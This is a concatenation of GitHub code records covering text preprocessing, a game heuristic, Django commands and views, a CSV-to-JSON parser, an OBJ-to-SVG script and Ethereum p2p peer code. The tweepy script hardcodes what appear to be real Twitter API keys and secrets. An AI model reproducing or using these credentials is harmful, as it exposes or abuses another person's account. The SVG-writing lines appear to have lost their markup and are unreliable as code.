Industrial_and_Scientific_sentence\n# Luxury_Beauty Luxury_Beauty_sentence\n# Musical_Instruments Musical_Instruments_sentence\n# Software Software_sentence\n# Video_Games Video_Games_sentence\n\ndata_name = 'All_Beauty_sentence'\ndata_dir = '20k'\ntrain_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Training_data/{data_name}/{data_dir}/'\n\n#%%\n# Write training dataframe to text file\ndef dataframe_generator(df):\n for _,row in df.iterrows():\n yield row['reviewText']\n \ndf = pd.read_csv(train_path+'train.csv')\ndf['reviewText']=df['reviewText'].apply(eval)\ndf['SPOS_idx']=df['SPOS_idx'].apply(eval)\n\ndf_proba = pd.read_csv(train_path+'train_word_probabilities.csv')\ndf_proba['word_prob']=df_proba['word_prob'].apply(eval)\n\n# Create dictionary.\ndictnr = Dictionary(dataframe_generator(df))\n\n# Write training files\nseparate_sentences = True\nwith open(train_path+'train_vidx.txt', 'w') as outfile_vidx, open(train_path+'train_text.txt', 'w') as outfile_text, open(train_path+'train_proba.txt', 'w') as outfile_proba:\n for _,row in df.iterrows():\n did = row['doc_id']\n word_proba = df_proba.loc[df_proba['doc_id']==did]['word_prob'].iloc[0]\n i=0\n for w in row['reviewText']:\n if w=='.':\n if separate_sentences:\n outfile_text.write('\\n')\n outfile_vidx.write('\\n')\n outfile_proba.write('\\n')\n continue\n outfile_text.write(w+' ')\n outfile_vidx.write(str(dictnr.token2id[w])+' ')\n outfile_proba.write(str(word_proba[i])+' ')\n i+=1\n outfile_text.write('\\n\\n')\n outfile_vidx.write('\\n\\n')\n outfile_proba.write('\\n\\n')\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","repo_name":"TP1997/Text-Preprocessing","sub_path":"to_JAVA_format.py","file_name":"to_JAVA_format.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39629040324","text":"import sys\nimport tweepy\n\nconsumer_token = '5VAX9gC5n7OuyCqKLKVA'\nconsumer_secret = 's8xrzrlvTKPnJ3v6R9k6UTnGTnAUqxJ3wC1ZWFSRg'\naccess_key = \"18420720-DMID708lIxZfyGu5aTLVnXVanbKnuJxBkPwGZTvuz\"\naccess_secret = \"NgDeDar4ZZsfjDwtoZ4YTMM2nSngq0TO2OWxJDHqK4\"\n\nauth = tweepy.OAuthHandler(consumer_token, consumer_secret)\nauth.set_access_token(access_key, access_secret)\napi = tweepy.API(auth)\napi.update_status(\"This is my Second tweet from command line! Woot!\")","repo_name":"stolksdorf/AdviceFromRob","sub_path":"auth setup/cmdtweet.PY","file_name":"cmdtweet.PY","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"27283626868","text":"from collections import deque\nfrom bisect import bisect_left\n\nn = int(input())\nal = list(map(int, input().split()))\ng = [ [] for _ in range(n)]\nfor _ in range(n-1):\n u,v = map(int, input().split())\n u-=1\n v-=1\n g[u].append(v)\n g[v].append(u)\n\nINF = 10**10\ndp = [INF]*(n+1)\ndp[0] = -INF\n\nhist = [(-1,-1)]*n\nvisited = [False]*n\nq = deque([(0,-1,-1)])\nansl = [-1]*n\nwhile q:\n curr_node, prev_ind, prev_v = q.popleft()\n if visited[curr_node]:\n dp[prev_ind] = prev_v\n # print('--skip===')\n # print(curr_node+1)\n # print(prev_ind,prev_v)\n # print(dp)\n continue \n ind = bisect_left(dp, al[curr_node])\n orig = dp[ind]\n dp[ind] = al[curr_node]\n ans = bisect_left(dp, INF) - 1\n ansl[curr_node] = ans\n # print('-----')\n # print(curr_node+1)\n # print(dp)\n hist[curr_node] = (ind,al[curr_node])\n visited[curr_node] = True\n novis = []\n for next_node in g[curr_node]:\n if not visited[next_node]: novis.append(next_node)\n else:q.appendleft((next_node,ind,orig))\n for v in novis: q.appendleft((v,ind,orig))\n\n\nfor a in ansl: print(a)","repo_name":"nami4mo/competitive-programming","sub_path":"2_kakomon/abc126-211/abc165_f.py","file_name":"abc165_f.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16295084556","text":"import node\nimport numpy as np\nimport math \nimport heuristics as h\n\ndef create_board():\n\tboard = [\t\n\t\t[0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0],\t\t\n\t]\n\n\tboard = np.array(board,dtype=object)\n\treturn board\n\n\ndef get_available_moves(board):\n\tmoves = []\n\tcolumn_counter = 0\n\n\tfor i in range(0, len(board)):\n\t\tfor j in range(0, len(board[column_counter])):\n\t\t\tif board[i][j] == 0:\n\t\t\t\tmoves.append([i, j])\n\t\tcolumn_counter += 1\n\n\treturn moves\n\n\ndef perform_move(board, move, player):\n\tboard[int(move[0])][int(move[1])] = player\n\n\treturn board\n\n\ndef calculate_score(board, player):\n\tif player == 1:\n\t\treturn calculate_score_player1(board)\n\telse:\n\t\treturn calculate_score_player2(board)\n\n\ndef calculate_score_player1(board):\n\tsequence = '11'\n\tsequence_enemy = '22'\n\n\tscore = []\n\tscore_enemy = []\n\tpieces_center = h.pieces_center(board, 1)\n\tpieces_center_enemy = h.pieces_center(board, 2)\n\n\tfor _ in range(0, 6):\n\t\tscore.append(verify_verticals(board, sequence) + pieces_center)\n\t\tscore.append(verify_main_diagonals(board, sequence) + pieces_center)\n\t\tscore.append(verify_secondary_diagonals(board, sequence) + pieces_center)\n\t\tscore_enemy.append(verify_verticals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_main_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_secondary_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tsequence += '1'\n\t\tsequence_enemy += '2'\n\n\tif max(score_enemy) == math.inf:\n\t\treturn -math.inf\n\telif max(score) == math.inf:\n\t\treturn math.inf\n\n\treturn max(score) - max(score_enemy)\n\n\ndef calculate_score_player2(board): \n\tsequence = '22'\n\tsequence_enemy = '11'\n\tscore = []\n\tscore_enemy = []\n\n\tpieces_center = h.pieces_center(board, 2)\n\tpieces_center_enemy = h.pieces_center(board, 1)\n\tfor _ in range(0, 6):\n\t\tscore.append(verify_verticals(board, sequence) + pieces_center)\n\t\tscore.append(verify_main_diagonals(board, sequence) + pieces_center)\n\t\tscore.append(verify_secondary_diagonals(board, sequence) + pieces_center)\n\t\tscore_enemy.append(verify_verticals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_main_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_secondary_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tsequence += '2'\n\t\tsequence_enemy += '1'\n\n\tif max(score_enemy) == math.inf:\n\t\t\treturn math.inf\n\telif max(score) == math.inf:\n\t\treturn -math.inf\n\n\treturn max(score_enemy) - max(score)\n\n\ndef verify_main_diagonals(board, sequence):\n\tscore = 0\n\t#print('main diagonals')\n\tmain_diagonals = [\n\t\t[board[0][0], board[1][0], board[2][0], board[3][0], board[4][0], board[5][0]],\n\t\t[board[0][1], board[1][1], board[2][1], board[3][1], board[4][1], board[5][1], board[6][0]],\n\t\t[board[0][2], board[1][2], board[2][2], board[3][2], board[4][2], board[5][2], board[6][1], board[7][0]],\n\t\t[board[0][3], board[1][3], board[2][3], board[3][3], board[4][3], board[5][3], board[6][2], board[7][1], board[8][0]],\n\t\t[board[0][4], board[1][4], board[2][4], board[3][4], board[4][4], board[5][4], board[6][3], board[7][2], board[8][1], board[9][0]],\n\t\t[board[1][5], board[2][5], board[3][5], board[4][5], board[5][5], board[6][4], board[7][3], board[8][2], board[9][1], board[10][0]],\n\t\t[board[2][6], board[3][6], board[4][6], board[5][6], board[6][5], board[7][4], board[8][3], board[9][2], board[10][1]],\n\t\t[board[3][7], board[4][7], board[5][7], board[6][6], board[7][5], board[8][4], board[9][3], board[10][2]],\n\t\t[board[4][8], board[5][8], board[6][7], board[7][6], board[8][5], board[9][4], board[10][3]],\n\t\t[board[5][9], board[6][8], board[7][7], board[8][6], board[9][5], board[1][4]]\n\t]\n\n\tlength = len(sequence)\n\tfor row in main_diagonals:\t\n\t\tif sequence in ''.join(str(i) for i in row):\n\t\t\tif length == 5:\n\t\t\t\t#print('5')\n\t\t\t\treturn math.inf\n\t\t\telif length == 4:\n\t\t\t\t#print('4')\n\t\t\t\tscore += 1350\n\t\t\telif length == 3:\n\t\t\t\t#print('3')\n\t\t\t\tscore += 450\n\t\t\telif length == 2:\n\t\t\t\t#print('2')\n\t\t\t\tscore += 150\n\t\n\treturn score\n\n\ndef verify_secondary_diagonals(board, sequence):\n\tscore = 0\n\tsecondary_diagonals = [\n\t\t[board[5][0], board[6][0], board[7][0], board[8][0], board[9][0], board[10][0]],\n\t\t[board[4][0], board[5][1], board[6][1], board[7][1], board[8][1], board[9][1], board[10][1]],\n\t\t[board[3][0], board[4][1], board[5][2], board[6][2], board[7][2], board[8][2], board[9][2], board[10][2]],\n\t\t[board[2][0], board[3][1], board[4][2], board[5][3], board[6][3], board[7][3], board[8][3], board[9][3], board[10][3]],\n\t\t[board[1][0], board[2][1], board[3][2], board[4][3], board[5][4], board[6][4], board[7][4], board[8][4], board[9][4], board[10][4]],\n\t\t[board[0][0], board[1][1], board[2][2], board[3][3], board[4][4], board[5][5], board[6][5], board[7][5], board[8][5], board[9][5]],\n\t\t[board[0][1], board[1][2], board[2][3], board[3][4], board[4][5], board[5][6], board[6][6], board[7][6], board[8][6]],\n\t\t[board[0][2], board[1][3], board[2][4], board[3][5], board[4][6], board[5][7], board[6][7], board[7][7]],\n\t\t[board[0][3], board[1][4], board[2][5], board[3][6], board[4][7], board[5][8], board[6][8]],\n\t\t[board[0][4], board[1][5], board[2][6], board[3][7], board[4][8], board[5][9]]\n\t]\n\n\tlength = len(sequence)\n\tfor row in secondary_diagonals:\n\t\tif sequence in ''.join(str(i) for i in row):\n\t\t\tif length == 5:\n\t\t\t\treturn math.inf\n\t\t\telif length == 4:\n\t\t\t\tscore += 1350\n\t\t\telif length == 3:\n\t\t\t\tscore += 450\n\t\t\telif length == 2:\n\t\t\t\tscore += 150\n\t\n\treturn score\n\n\ndef verify_verticals(board, sequence):\n\tscore = 0\n\tverticals = [\n\t\t[board[0][0], board[0][1], board[0][2], board[0][3], board[0][4]],\n\t\t[board[1][0], board[1][1], board[1][2], board[1][3], board[1][4], board[1][5]],\n\t\t[board[2][0], board[2][1], board[2][2], board[2][3], board[2][4], board[2][5], board[2][6]],\n\t\t[board[3][0], board[3][1], board[3][2], board[3][3], board[3][4], board[3][5], board[3][6], board[3][7]],\n\t\t[board[4][0], board[4][1], board[4][2], board[4][3], board[4][4], board[4][5], board[4][6], board[4][7], board[4][8]],\n\t\t[board[5][0], board[5][1], board[5][2], board[5][3], board[5][4], board[5][5], board[5][6], board[5][7], board[5][8], board[5][9]],\n\t\t[board[6][0], board[6][1], board[6][2], board[6][3], board[6][4], board[6][5], board[6][6], board[6][7], board[6][8]],\n\t\t[board[7][0], board[7][1], board[7][2], board[7][3], board[7][4], board[7][5], board[7][6], board[7][7]],\n\t\t[board[8][0], board[8][1], board[8][2], board[8][3], board[8][4], board[8][5], board[8][6]],\n\t\t[board[9][0], board[9][1], board[9][2], board[9][3], board[9][4], board[9][5]],\n\t\t[board[10][0], board[10][1], board[10][2], board[10][3], board[10][4]]\n\t]\n\t\n\tlength = len(sequence)\n\tfor row in verticals:\n\t\tif sequence in ''.join(str(i) for i in row):\n\t\t\tif length == 5:\n\t\t\t\treturn math.inf\n\t\t\telif length == 4:\n\t\t\t\tscore += 1350\n\t\t\telif length == 3:\n\t\t\t\tscore += 450\n\t\t\telif length == 2:\n\t\t\t\tscore += 150\n\t\n\treturn score\n\n\ndef removal_piece(board, server_moves, player):\n\tif player == '1':\n\t\tfor move in server_moves:\n\t\t\tif board[move[0]-1][move[1]-1] == 2:\n\t\t\t\treturn move\n\telse:\n\t\tfor move in server_moves:\n\t\t\tif board[move[0]-1][move[1]-1] == 1:\n\t\t\t\treturn move\n\t\n\treturn False\n\n\ndef forbidden_moves(board, server_moves):\n\tforbidden_moves = []\n\tmoves = get_available_moves(board)\n\n\tfor move in moves:\n\t\tif (move[0]+1, move[1]+1) not in server_moves:\n\t\t\tforbidden_moves.append([move[0]+1, move[1]+1])\n\t\n\treturn forbidden_moves\n\ndef show_tree(nodes):\n\twhile(len(nodes) > 0):\n\t\tnode = nodes.pop(0)\n\t\t\n\t\tprint(node.get_board())\n\t\tprint(node.get_score())\n\n\t\tnew_nodes = node.get_lowers()\n\t\tfor lower in new_nodes:\n\t\t\tnodes.append(lower)","repo_name":"douglasscorrea/boku-player","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18876346766","text":"from SPARQLWrapper import SPARQLWrapper2\nfrom django.core.management.base import NoArgsCommand\nfrom django.db import transaction, reset_queries\nfrom jocondelab.models import Country\nfrom core.models import Notice\nfrom core.utils import show_progress\nfrom django.utils.http import urlquote\nfrom optparse import make_option\n\n\nclass Command(NoArgsCommand):\n\n help = \"Import countries from dbpedia\"\n \n option_list = NoArgsCommand.option_list + (\n make_option('-b', '--batch-size',\n dest= 'batch_size',\n type='int',\n default= 50,\n help= 'number of object to import in bulk operations' \n ), \n )\n \n def handle_noargs(self, **options):\n \n def count_notices(uri):\n return Notice.objects.filter(noticeterm__term__dbpedia_uri=uri).count()\n \n def add_country(dbpedia_uri, iso_code_3, iso_code_2):\n nb_notices = count_notices(dbpedia_uri)\n countryobj, created = Country.objects.get_or_create(\n dbpedia_uri = dbpedia_uri,\n defaults = {\n 'iso_code_3': iso_code_3,\n 'iso_code_2': iso_code_2,\n 'nb_notices': nb_notices\n }\n )\n if not created:\n countryobj.iso_code_3 = iso_code_3\n countryobj.iso_code_2 = iso_code_2\n countryobj.nb_notices = nb_notices\n countryobj.save()\n \n writer = None\n resource_prefix = u'http://fr.dbpedia.org/resource/'\n batch_size = options.get('batch_size', 50)\n \n transaction.enter_transaction_management()\n transaction.managed()\n\n endpoint = SPARQLWrapper2(\"http://fr.dbpedia.org/sparql\")\n sparql = \"\"\"\n select distinct ?pays ?code where {\n ?pays rdf:type dbpedia-owl:Country .\n ?pays prop-fr:iso ?code\n } LIMIT 300\n \"\"\"\n endpoint.setQuery(sparql)\n results = endpoint.query()\n \n count = len(results.bindings)\n \n substitutions = [\n (u'R%C3%A9publique_populaire_de_Chine', u'Chine')\n ]\n \n for i,binding in enumerate(results.bindings):\n if binding[u\"code\"].type == 'literal':\n resource_suffix = urlquote(binding[u\"pays\"].value.replace(resource_prefix,\"\"))\n for s in substitutions:\n if resource_suffix == s[0]:\n resource_suffix = s[1]\n break\n dbpedia_uri = u'%s%s'%(resource_prefix, resource_suffix)\n writer = show_progress(i+1, count, dbpedia_uri, 50, writer)\n iso_codes = binding[u\"code\"].value.split(\", \")\n if (len(iso_codes) > 1):\n add_country(dbpedia_uri, iso_codes[0], iso_codes[1])\n\n if not ((i+1) % batch_size):\n transaction.commit()\n reset_queries()\n\n # insert code for Maurice and Antarctica\n extra_countries = [\n (u'%sMaurice_(pays)'%resource_prefix, \"MUS\", \"MU\"),\n (u'%sAntarctique'%resource_prefix, \"ATA\", \"AQ\")\n ]\n for c in extra_countries:\n add_country(*c)\n \n transaction.commit()\n reset_queries()\n transaction.leave_transaction_management()\n ","repo_name":"IRI-Research/jocondelab","sub_path":"src/jocondelab/management/commands/import_countries.py","file_name":"import_countries.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"43911294359","text":"from crm.forms import CamModelRequestForm, CamModelRequestImageFormset\nfrom authentication.forms import ProfileCreationForm\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.views import View\nimport uuid\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass Index(View):\n def get(self, request):\n # form = ProfileCreationForm()\n return redirect('authentication:login')\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass Main(View):\n def get(self, request):\n # form = ProfileCreationForm()\n return render(request, 'index.html')\n\n # def post(self, request):\n # form = ProfileCreationForm(request.POST or None)\n # if form.is_valid():\n # form.save()\n # email = request.POST['email']\n # password = request.POST['password1']\n # user = authenticate(email=email, password=password)\n # if user is not None:\n # login(request, user)\n # return redirect('management:index')\n # else:\n # return redirect('authentication:login')\n # else:\n # return render(request, 'registration/signup.html', {'form': form})\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass ModelRequest(View):\n def get(self, request):\n form = CamModelRequestForm()\n formset = CamModelRequestImageFormset()\n return render(request, 'model_request/model_request_form.html', {'form': form, 'formset': formset})\n\n def post(self, request):\n form = CamModelRequestForm(request.POST or None, request.FILES or None)\n formset = CamModelRequestImageFormset(request.POST or None, request.FILES or None)\n if form.is_valid():\n cammodel_request = form.save()\n for image in formset:\n if image.is_valid():\n if 'DELETE' in image.cleaned_data and image.cleaned_data['DELETE']:\n if image.cleaned_data['id']:\n image.cleaned_data['id'].delete()\n continue\n if image.empty_permitted and not image.has_changed():\n continue\n image_instance = image.save(commit=False)\n image_instance.request = cammodel_request\n image_instance.save()\n # cammodel_request.request_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, cammodel_request.name)\n # cammodel_request.save()\n messages.success(request, 'Заявка принята. С вами свяжутся по указанному вами номеру или почте. Спасибо.')\n return redirect('common:index')\n else:\n messages.error(request, f'Произошла ошибка. {form.errors}')\n return render(request, 'model_request/model_request_form.html', {'form': form, 'formset': formset})\n","repo_name":"Achekeev/CRM3","sub_path":"common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19761733367","text":"#!/usr/bin/python\n# James Tobat, 2014\nimport csv\nimport os\nimport re\nimport copy\n\nprogramName_template = \"DARPA Program Name\"\n# Parses a csv document in a mode (pub, project, program)\n# using a schema that it can attach JSON information to.\n# The end result is an array of JSON information which includes\n# the document title as well as all the JSON records identified\n# in the document (all use the schema passed in)\ndef parse_csv(document, mode, schema, template):\n JSON_Information = []\n \n if not template:\n document = os.path.basename(document)\n # Uses the name of the document given but replaces the file type\n # with JSON. This will be the name of the output file.\n doc_name = re.sub(\".csv\", \".json\", document, flags=re.I)\n JSON_Information.append(doc_name)\n # Identifies the DARPA Program by removing\n # the schema name from the file name e.g.\n # HACM-pubs would change to HACM.\n # Assumes the title of the document contains the \n # DARPA Program's name either in the form\n # DARPA_Program-schema_type.filetype e.g. HACM-pubs.csv\n # or is the name of the file itself e.g. PPAML.csv\n darpa_program = re.sub(\"-.*\",\"\",document)\n darpa_program = re.sub(\"\\..*\",\"\",darpa_program)\n schema['DARPA Program'] = darpa_program\n #print doc_name\n \n with open(document, 'r') as read_file:\n reader = csv.reader(read_file)\n # With the first row, checks the column titles given\n # in order to identify which column maps to which schema\n # item\n initial_row = True\n first_values = False\n team_index = -1\n title_index = -1\n link_index = -1\n project_index = -1\n category_index = -1\n code_index = -1\n home_index = -1\n description_index = -1\n license_index = -1\n\n template_fields = {} # stores row locations of JSON fields\n for row in reader:\n # Uses the schemas from the examples JSON file, this assumes\n # that the Excel columns have the same names as the JSON schema fields\n if template:\n # Checks if it one of the first rows\n if initial_row:\n # Checks to see if a header is present and ignores it\n header = re.search(\"Meta Data Fields\", row[0], flags=re.I)\n # If it isn't the header, assumes the next rows are data \n # for the JSON file\n if not header:\n initial_row = False\n k = 0\n first_values = True\n # Finds and stores the row index of each JSON field\n for column in row:\n template_fields[column] = k\n k += 1\n else:\n # This is only meant to be run once, as it finds the\n # DARPA Program Name and creates a file name from it\n # using the mode.\n darpa = \"\"\n if first_values:\n if mode == 'program':\n darpa = 'DARPA Program Name'\n else: \n darpa = 'DARPA Program'\n index = template_fields[programName_template]\n program_name = row[index].strip()\n schema[darpa] = program_name\n file_name = program_name + '-' + mode + '.json'\n JSON_Information.append(file_name)\n first_values = False\n \n schema_copy = copy.deepcopy(schema) # Ensures that no wrong values are kept\n # Goes through each JSON field in the schema and finds its corresponding value\n for key, value in schema.iteritems():\n # Ensures that the DARPA Program Name is kept and that fields that\n # aren't present in the spreadsheet aren't being read in.\n if key != darpa and key in template_fields:\n index = template_fields[key]\n # Splits Excel cells that have comma separated values\n # into a list then trims each value of excess whitespace\n item_list = row[index].split(',')\n if isinstance(schema[key], list):\n new_list = []\n for item in item_list:\n item = item.strip()\n if item.endswith('.'):\n item = item[:-1]\n new_list.append(item)\n\n schema_copy[key] = new_list\n else:\n # Simply stores the value in the schema\n # if it isn't a list.\n schema_copy[key] = row[index].strip()\n \n JSON_Information.append(schema_copy) \n else:\n if mode == \"pub\":\n if initial_row:\n initial_row = False\n i = 0\n # Maps the column titles to indices\n # which ensures that the script will\n # work even if the order changes\n for column in row:\n if column == \"Team\":\n team_index = i\n #print \"team %i\" % i\n if column == \"Title\":\n title_index = i\n #print \"title %i\" % i\n if column == \"Link\":\n link_index = i\n #print \"link %i\" % i\n i += 1\n else:\n #print row\n # Copies all relevant schema information\n # in a row to the JSON array.\n # Always uses a blank copy of the schema\n # to ensure that wrong information isn't \n # copied.\n record = copy.deepcopy(schema)\n record['Title'] = row[title_index]\n record['Program Teams']=[row[team_index]]\n record['Link'] = row[link_index]\n JSON_Information.append(record)\n\n if mode == \"project\":\n if initial_row:\n initial_row = False\n i = 0\n # Maps the column titles to indices\n # which ensures that the script will\n # work even if the order changes\n for column in row:\n if column == \"Team\":\n team_index = i\n if column == \"Project\":\n project_index = i\n if column == \"Category\":\n category_index = i\n if column == \"Code\":\n code_index = i\n if column == \"Public Homepage\":\n home_index = i\n if column == \"Description\":\n description_index = i\n if column == \"License\":\n license_index = i\n i += 1\n else:\n # Copies all relevant schema information\n # in a row to the JSON array.\n # Always uses a blank copy of the schema\n # to ensure that wrong information isn't \n # copied.\n record = copy.deepcopy(schema)\n record['Software'] = row[project_index]\n record['Program Teams']=[row[team_index]]\n record['External Link'] = row[home_index]\n record['Public Code Repo'] = row[code_index]\n record['Description'] = row[description_index]\n record['License'] = [row[license_index]]\n \n # Assumes the catagories of a project are seperated\n # by slashes e.g. Cloud/Cybersecurity/Big Data.\n # Will also trim non-important white space.\n categories = row[category_index].split('/')\n for j in xrange(len(categories)):\n category = categories[j]\n categories[j] = category.strip()\n record['Categories'] = categories\n\n JSON_Information.append(record)\n\n return JSON_Information\n\n","repo_name":"ericwhyne/open-catalog-generator","sub_path":"transforms/csv_to_JSON.py","file_name":"csv_to_JSON.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"42368364250","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef main(argv):\n\tif len(argv) < 3:\n\t\tprint(\"Usage: %s input.obj output.svg\" % argv[0])\n\t\treturn\n\tinput_filename = argv[1]\n\toutput_filename = argv[2]\n\n\ttex_coords = []\n\twith open(input_filename, \"r\", encoding=\"utf-8\") as inp:\n\t\twith open(output_filename, \"w\") as out:\n\t\t\tw = 1024\n\t\t\th = 1024\n\t\t\t\n\t\t\tout.write(\"\\n\" % (w, h))\n\t\t\tfor line in inp:\n\t\t\t\tparts = line.split(\"#\")[0].strip().split(\" \")\n\t\t\t\tif parts[0] == \"vt\":\n\t\t\t\t\ttex_coords.append((float(parts[1]), float(parts[2])))\n\t\t\t\telif parts[0] == \"f\":\n\t\t\t\t\tpoints = []\n\t\t\t\t\tfor part in parts[1:]:\n\t\t\t\t\t\tparts2 = part.split(\"/\")\n\t\t\t\t\t\ttex_coord = tex_coords[int(parts2[1]) - 1]\n\t\t\t\t\t\tx = tex_coord[0] * w\n\t\t\t\t\t\ty = h - tex_coord[1] * h - 1\n\t\t\t\t\t\tpoints.append((x, y))\n\t\t\t\t\tout.write(\n\t\t\t\t\t\t\"\\t\\n\" %\n\t\t\t\t\t\t\" \".join(map(lambda point: \",\".join(map(str, point)), points))\n\t\t\t\t\t)\n\t\t\t\n\t\t\tout.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","repo_name":"maumyrtille/VoxelGameClient","sub_path":"scripts/make_unwrap.py","file_name":"make_unwrap.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71344095128","text":"from abc import abstractmethod\nimport asyncio\nimport functools\nimport operator\nimport random\nfrom typing import (\n Container,\n Dict,\n List,\n Tuple,\n Type,\n Union,\n)\n\nfrom cached_property import cached_property\n\nfrom lahja import EndpointAPI\n\nfrom cancel_token import CancelToken, OperationCancelled\n\nfrom eth_utils.logging import get_extended_debug_logger\nfrom eth_utils.toolz import (\n excepts,\n groupby,\n)\n\nfrom eth_typing import BlockNumber, Hash32\n\nfrom eth.abc import VirtualMachineAPI\nfrom eth.constants import GENESIS_BLOCK_NUMBER\nfrom eth.rlp.headers import BlockHeader\n\nfrom p2p.abc import BehaviorAPI, NodeAPI, SessionAPI\nfrom p2p.constants import (\n MAX_SEQUENTIAL_PEER_CONNECT,\n PEER_CONNECT_INTERVAL,\n)\nfrom p2p.disconnect import DisconnectReason\nfrom p2p.typing import NodeID\nfrom p2p.exceptions import (\n MalformedMessage,\n NoConnectedPeers,\n PeerConnectionLost,\n UnknownAPI,\n)\nfrom p2p.peer import (\n BasePeer,\n BasePeerFactory,\n)\nfrom p2p.peer_backend import (\n BasePeerBackend,\n)\nfrom p2p.peer_pool import (\n BasePeerPool,\n)\nfrom p2p.service import BaseService\nfrom p2p.token_bucket import TokenBucket\nfrom p2p.tracking.connection import (\n BaseConnectionTracker,\n NoopConnectionTracker,\n)\n\nfrom trinity.constants import TO_NETWORKING_BROADCAST_CONFIG\nfrom trinity.exceptions import BaseForkIDValidationError, ENRMissingForkID\nfrom trinity.protocol.common.abc import ChainInfoAPI, HeadInfoAPI\nfrom trinity.protocol.common.api import ChainInfo, HeadInfo, choose_eth_or_les_api\nfrom trinity.protocol.eth.api import ETHV63API, ETHAPI\nfrom trinity.protocol.eth.forkid import (\n extract_fork_blocks,\n extract_forkid,\n validate_forkid,\n)\nfrom trinity.protocol.les.api import LESV1API, LESV2API\n\nfrom trinity.components.builtin.network_db.connection.tracker import ConnectionTrackerClient\nfrom trinity.components.builtin.network_db.eth1_peer_db.tracker import (\n BaseEth1PeerTracker,\n EventBusEth1PeerTracker,\n NoopEth1PeerTracker,\n)\n\nfrom .boot import DAOCheckBootManager\nfrom .context import ChainContext\nfrom .events import (\n DisconnectPeerEvent,\n)\n\n\np2p_logger = get_extended_debug_logger('p2p')\n\n\nclass BaseChainPeer(BasePeer):\n boot_manager_class = DAOCheckBootManager\n context: ChainContext\n\n @cached_property\n def chain_api(self) -> Union[ETHAPI, ETHV63API, LESV1API, LESV2API]:\n return choose_eth_or_les_api(self.connection)\n\n @cached_property\n def head_info(self) -> HeadInfoAPI:\n return self.connection.get_logic(HeadInfo.name, HeadInfo)\n\n @cached_property\n def chain_info(self) -> ChainInfoAPI:\n return self.connection.get_logic(ChainInfo.name, ChainInfo)\n\n def get_behaviors(self) -> Tuple[BehaviorAPI, ...]:\n return (\n HeadInfo().as_behavior(),\n ChainInfo().as_behavior(),\n )\n\n @property\n @abstractmethod\n def max_headers_fetch(self) -> int:\n ...\n\n def setup_connection_tracker(self) -> BaseConnectionTracker:\n if self.has_event_bus:\n return ConnectionTrackerClient(self.get_event_bus())\n else:\n self.logger.warning(\n \"No event_bus set on peer. Connection tracking falling back to \"\n \"`NoopConnectionTracker`.\"\n )\n return NoopConnectionTracker()\n\n\nclass BaseProxyPeer(BaseService):\n \"\"\"\n Base class for peers that can be used from any process where the actual peer is not available.\n \"\"\"\n\n def __init__(self,\n session: SessionAPI,\n event_bus: EndpointAPI,\n token: CancelToken = None):\n\n self.event_bus = event_bus\n self.session = session\n super().__init__(token)\n\n def __str__(self) -> str:\n return f\"{self.__class__.__name__} {self.session}\"\n\n async def _run(self) -> None:\n self.logger.debug(\"Starting Proxy Peer %s\", self)\n await self.cancellation()\n\n async def disconnect(self, reason: DisconnectReason) -> None:\n self.logger.debug(\"Forwarding `disconnect()` call from proxy to actual peer: %s\", self)\n await self.event_bus.broadcast(\n DisconnectPeerEvent(self.session, reason),\n TO_NETWORKING_BROADCAST_CONFIG,\n )\n await self.cancel()\n\n\nclass BaseChainPeerFactory(BasePeerFactory):\n context: ChainContext\n peer_class: Type[BaseChainPeer]\n\n\nclass BaseChainPeerPool(BasePeerPool):\n context: ChainContext\n connected_nodes: Dict[NodeAPI, BaseChainPeer] # type: ignore\n peer_factory_class: Type[BaseChainPeerFactory]\n peer_tracker: BaseEth1PeerTracker\n\n async def maybe_connect_more_peers(self) -> None:\n rate_limiter = TokenBucket(\n rate=1 / 